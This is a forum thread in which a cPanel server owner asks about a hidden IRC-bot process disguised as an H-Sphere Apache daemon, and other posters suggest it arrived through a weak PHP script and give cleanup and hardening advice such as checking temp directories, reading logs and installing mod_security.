My Cpanel server has crashed today:

When I look back in my logs I see that one proccess is eating all my cpu:
/hsphere/shared/apache/bin/httpd -DSSL
(running as nobody and connecting to irc servers)

I don't run Hsphere and the program/directory doesn't exist!
I don't have anly old phpbb forums and I am running PHP 4.4.0, so I don't think it is a gab in my PHP.

What is that program? How does it run? And how does I fix this problem?

any idea?

Thanks!

Sounds like you've been hit with a rootkit (By virtue of you not being able to see the directory) that is trying to pass itself off as the HSphere HTTP process.

rkunter doesn't show any rootkit evena als chrootkit

And a rootkit running as nobody can't do anything of am I being wrong?

The clue is in the name, if there's an RK on it, then it means they've exploited something local and got root. In this case, it could just be that they've exploited a weak PHP script and uploaded their IRC bot, executed it, and deleted the executable - Hence why you can't find it.

yes but there isn't installed other things as root or something.

I have removed it, and it doesn't runs anymore

Is there a fix for apache to stop uploads through weak php scripts?

It has been brought to our attention that certain exploit scripts are installing an IRC binary on servers, that makes it look like a H-Sphere Apache process. This is in not related to H-Sphere. The script tries to spoof itself as h-sphere apache process.

Greetings:

FYI. Root Kit hunter and chkrootkit only detect root kits.

A lot of the latest attacks do not use root kits, but work through vulnerabilities in PHP, CGI, etc. along with insecure operating systems and partitions.

Check /tmp, /var/tmp (and if on Linux-based, /dev/shm) for suspicious files.

Also check for httpd owned files in your users imges directories, and /var/spool/samba can be a spot as well.

Thank you.

Its just a spoof... I would look into reading the apache logs for possible ways it was exploited, install mod_security, etc. Also Its not a good idea to remove the files UNTIL you know how they got there for forensics purposes.